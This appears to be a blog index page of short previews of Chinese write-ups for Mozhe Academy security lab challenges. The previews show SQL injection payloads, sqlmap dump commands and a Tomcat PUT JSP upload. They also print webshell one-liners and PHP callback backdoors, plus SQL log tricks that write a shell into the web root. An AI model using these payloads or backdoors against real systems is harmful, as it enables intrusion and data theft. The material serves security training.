
Mozhe
多崎巡礼
相遇枕藉乎舟中,不知东方之既白
展开
-
墨者学院 - Apache Struts2系列
文章目录struct2-001struct2-004struct2-007struct2-008struct2-009struct2-001因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执...原创 2019-01-11 12:15:37 · 2636 阅读 · 0 评论 -
墨者学院 - SQL语句利用日志写shell
outfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%'; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为s...转载 2018-09-07 18:04:59 · 254 阅读 · 0 评论 -
墨者学院 - Tomcat 远程代码执行漏洞利用(第1题)
刷新fit网站 burp截包,repeater,更改不安全的HTTP方法为PUT(将get更改为options可查看服务器支持哪些)PUT /自定义文件名/ HTTP/1.1eg: PUT /9.jsp/ HTTP/1.1 (jsp后无空格,反之会报错)添加以下代码<%@ page language="java" import="java.util.*,ja...原创 2018-09-17 17:22:23 · 1337 阅读 · 0 评论 -
墨者学院 - Apache Struts2远程代码执行漏洞(S2-005)复现
K8大佬神器一出done原创 2018-09-17 15:29:16 · 2124 阅读 · 1 评论 -
墨者学院 - WordPress插件漏洞分析溯源
使用wpscan扫面wordpress有漏洞的插件wpscan --url "ip" --enumerate vp 查找插件漏洞http://www.bkjia.com/xtaq/783717.html构造链接http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&actio...原创 2018-08-30 11:41:10 · 2286 阅读 · 0 评论 -
墨者学院 - SQL注入实战(防注入)-Access
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码必应一下access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了...原创 2018-09-04 15:26:59 · 1590 阅读 · 0 评论 -
墨者学院 - Joomla插件漏洞分析溯源
必应一下(拒绝垃圾百度)构造语句ip/index.php?option=com_collector&amp;view=filelist&amp;tmpl=component&amp;folder=&amp;type=1在image上传一句话木马,菜刀连接done...原创 2018-09-04 15:02:38 · 1106 阅读 · 0 评论 -
墨者学院 - WebShell文件上传分析溯源(第1题)
此题同墨者学院 - WebShell文件上传漏洞分析溯源(第5题)一模一样啊,,,https://blog.youkuaiyun.com/qq_42357070/article/details/81665014。。。原创 2018-08-29 16:13:10 · 1073 阅读 · 0 评论 -
墨者学院 - IIS写权限漏洞分析溯源
该漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 iis scan工具链接链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54...原创 2018-08-29 15:42:11 · 1475 阅读 · 1 评论 -
墨者学院 - HTTP动作练习
方法一:如图查看源码-复制content的内容进入 ip/info.phppost 方法二:burp抓包-右键change request methoddone需要注意的是,如果直接改包的话,需要将提交方式改为POST,加上content-type ...原创 2018-08-28 15:01:46 · 1310 阅读 · 0 评论 -
墨者学院 - 远程电子数据取证-木马分析
第一题驱动级文件隐藏此驱动级隐藏文件会在服务项增加一个xlkfs的服务驱动文件路径为:c:\WINDOWS\system32\drivers\xlkfs.sys配置文件路径为:c:\WINDOWS\xlkfs.ini转自:http://www.91ri.org/15356.html 独自等待 解题思路:连接上服务器,先搜索SEO找到seo文件夹路径,在C:\Inet...原创 2018-08-28 12:35:16 · 2175 阅读 · 0 评论 -
墨者学院 - 密码学加解密实训(Zip伪加密)
zip格式文件伪加密实践是检验真理的唯一标准简介zip文件是一种压缩文件,可进行加密,也可不加密。而伪加密是在未加密的zip文件基础上修改了它的压缩源文件目录区里的全局方式位标记的比特值,使得压缩软件打开它的时候识别为加密文件,提示输入密码, 而在这个时候,不管你用什么软件对其进行密码破解,都无法打开它!这就是它存在的意义!zip官方文档zip中文详解文件组成压缩源...原创 2018-09-18 15:34:21 · 1765 阅读 · 1 评论 -
墨者学院 - PHP本地包含漏洞代码溯源
根据r.php源码构造本地文件读取url:/r.php?p=../../../../../../../the_key_is_heredone原创 2018-09-25 14:50:21 · 779 阅读 · 0 评论 -
墨者学院 - rsync未授权访问漏洞利用
关于rsync语句解释链接如下http://man.linuxde.net/rsync root@kali:~# rsync -v rsync://iproot@kali:~# rsync -v rsync://ip/volumeroot@kali:~# rsync -avz rsync://ip/volume/key_xxx.php /root done ...原创 2018-09-26 11:21:47 · 2153 阅读 · 0 评论 -
墨者学院 - 主机溢出提权漏洞分析
背景介绍公司内部服务器,上面有一简单的上传入口,刚入职的小伙伴在C盘根目录下有一个TXT文本文件,说权限设置的很低,除Administrator外,其他用户无法读取到内容,直接向安全工程师&quot;墨者&quot;发出挑战,让其测试。实训目标1、掌握文件上传的技巧;2、掌握IIS中间件存在的畸形解析漏洞;3、了解Windows系统CMD命令执行;4、了解查看操作系统安全补丁情况;5、了解Windows...原创 2018-11-05 13:30:00 · 984 阅读 · 0 评论 -
墨者学院 - 密码学加解密实训-隐写术(第3题)
实训目标1、了解文件的格式;2、了解隐写术常见的几种方法;3、掌握隐写工具“MP3Stego”的使用方法;解题方向分析图片的文件类型是否正常。解题思路打开链接进入页面自然,下载得到一个压缩包解压得到一张小姐姐图片winhex打开拉到最下mp3和txt,此事必有蹊跷更改图片后缀为rar(简单的隐写题开局binwalk&winhex不解释。。。)解压得到一个音...原创 2018-11-04 22:26:38 · 579 阅读 · 0 评论 -
墨者学院 - CMS系统漏洞分析溯源(第5题)
phpecms1.3 cookies欺骗漏洞进后台phpecms1.3/admin/cms_check.php<?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); };?> 判断如果没有admin_na...原创 2018-10-29 17:34:25 · 1658 阅读 · 0 评论 -
墨者学院 - CMS系统漏洞分析溯源(第3题)
新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数...原创 2018-10-29 15:56:05 · 1417 阅读 · 0 评论 -
墨者学院 - Bash漏洞分析溯源
bash漏洞技术层面分析漏洞起源:漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令:env x='() { :;}; echo vulnerable' bash -c "echo this is a test"如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出:vu...原创 2018-10-10 17:55:06 · 1310 阅读 · 1 评论 -
墨者学院 - CMS系统漏洞分析溯源(第4题)
使用火狐插件cookie-editor新增一个cookie value如下username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...原创 2018-10-09 17:23:36 · 1084 阅读 · 1 评论 -
墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)和以往的套路一样,猜得到字段是4个。。。http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4url编码构造如...原创 2018-09-28 16:12:55 · 2721 阅读 · 0 评论 -
墨者学院 - SQL注入漏洞测试(参数加密)
list.php御剑扫描得到 http://219.153.49.228:48291/news/list.zip解压得到源码从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mo...原创 2018-09-28 11:30:17 · 2587 阅读 · 0 评论 -
墨者学院 - Redis配置错误导致的远程代码漏洞溯源
安装过程https://blog.youkuaiyun.com/dalaoadalaoa/article/details/46885171安装只需要一部分,mark一下,毕竟解题的是客户端重启命令 src/redis-server redis.conf 搜的关于重启的答案全tm标的原创的复制粘贴来的low比水货呵呵 此题答案链接在这https://blog.youkuaiyun.com/u01...原创 2018-09-26 15:10:12 · 861 阅读 · 3 评论 -
墨者学院 - 远程电子数据取证-服务器分析
(第1题)mstscC盘-搜索recycler(第2题)开始-->管理工具-->事件查看器-->系统-->选择administrator用户操作的事件(ID:1074)-->可以看到开机关机和注释注释中拿到key (第3题)C:WINDOW\Stemp (第4题)C:\txtkey_1.txt...这四颗星,,怕不是个勺...原创 2018-08-28 11:22:59 · 1209 阅读 · 0 评论 -
墨者学院 - X-Forwarded-For注入漏洞实战
burp抓包,将抓到数据存为 xxx.txt爆数据库sqlmap.py -r xxx.txt --dbs --batch爆表名sqlmap.py -r xxx.txt -d 数据库名 --table --batch爆表中的字段sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch爆字段中的值sqlmap.py -r ...原创 2018-08-28 10:12:22 · 1495 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
网站公告存在注入点 ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg ...原创 2018-08-20 17:07:53 · 1762 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第9题)
审查代码1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码2、没有新的发现,就去目录查找,根据最后的修改时间排查。 <?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']);...原创 2018-08-05 15:18:22 · 863 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第8题)
审查代码1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码2、没有新的发现,就去目录查找,根据最后的修改时间排查。C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php <?php error_reporting(0);...原创 2018-08-05 15:07:07 · 750 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第7题)
代码审查在random_int.php 前排 发现以下回调后门<?phperror_reporting(0);$e = $_REQUEST['e'];$arr = array('test', $_REQUEST['POST']);uasort($arr, base64_decode($e));诸如此类还有<?php $e = $_REQUEST['...原创 2018-08-05 14:48:07 · 731 阅读 · 0 评论 -
墨者学院 - PHP代码分析溯源(第4题)
打开发现提示key在根目录,且给出代码<?phpeval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));?> 这是base64加密+压缩的编码简单方法就是直接把eval改成echo输出执行<?phpecho(gzinflate(base64_decode(‘...原创 2018-08-05 14:17:23 · 1143 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第3题)
$g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码gethtml路径下拿到key <?php...原创 2018-07-31 15:45:47 · 840 阅读 · 0 评论 -
墨者学院 - WebShell文件上传漏洞分析溯源(第4题)
1、先随便上传一个图片,发现是php类型的站,再分别上传.jpg、.php文件测试,发现服务器不允许上传php类型文件,2、一句话木马写入1.php并上传,用burp代理,修改Content-Type”类型为” image/jpeg”3、点击“Forward”或者在Repeater中的“Go”,得知文件上传后的访问地址4、菜刀连接木马1.php,找到Key ...原创 2018-07-31 15:18:13 · 598 阅读 · 0 评论 -
墨者学院 - IP地址伪造(第1题)
猜用户密码得到 用户:admin 密码:admin登陆时提示 只允许在服务器上登陆则需要伪装ip地址方法一:需要工具 : 火狐浏览器 :X-Forwarded-For Header使用X-Forwarded-For Header进行伪造输入常见弱密码 admin admin即可...原创 2018-08-04 23:05:23 · 1809 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第6题)
审查代码,在图片文件夹中有php(有毒)使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析,类似于第五题,用e来接受assert的base64加密的值作为函数,用POST作为密码使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...原创 2018-08-03 22:34:29 · 489 阅读 · 0 评论 -
墨者学院 - PHP代码分析溯源(第3题)
在for 循环中是判断输入的字符是否有存在在1和9之间的数字如果不存在判断是否等于54975581388等于则绕过即 又不能等于数字1-9又要等于54975581388但是这里在比较的时候就是用弱类型的,所以不要求完全一致。php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc键入 0xccccccccc输入得到key...原创 2018-08-03 18:05:00 · 724 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(Access数据库)
进入公告找到注入点地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。4.猜测这个表里面有哪些字段:order ...原创 2018-07-26 16:10:54 · 1003 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第10题)
审查代码1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码2、没有新的发现,就去目录查找,根据最后的修改时间排查。 <?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...原创 2018-08-05 15:28:35 · 558 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第11题)
<?php if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){ //若get到的1不为空且1=GET.fPZ87的话执行下面操作 $_=@fopen('t.php', 'a'); ...原创 2018-08-06 10:30:27 · 777 阅读 · 0 评论 -
墨者学院 - CMS系统漏洞分析溯源(第2题)
登陆后台。使用admin.php就可以进入后台用户名密码都是自动填上的,直接登陆就可以。界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。 ...原创 2018-08-06 12:51:38 · 1387 阅读 · 1 评论 -
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
postgreSQL的注入和mysql 的注入语法是类似的,有一点小的差异:postgreSQL查询当前数据库使用:current_database()函数;在pg_stat_user_tables库查询表名,使用relname关键字;和MySQL的limit使用有差异,语法为limit 1 offset 0。 手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...转载 2018-08-20 16:31:14 · 3435 阅读 · 1 评论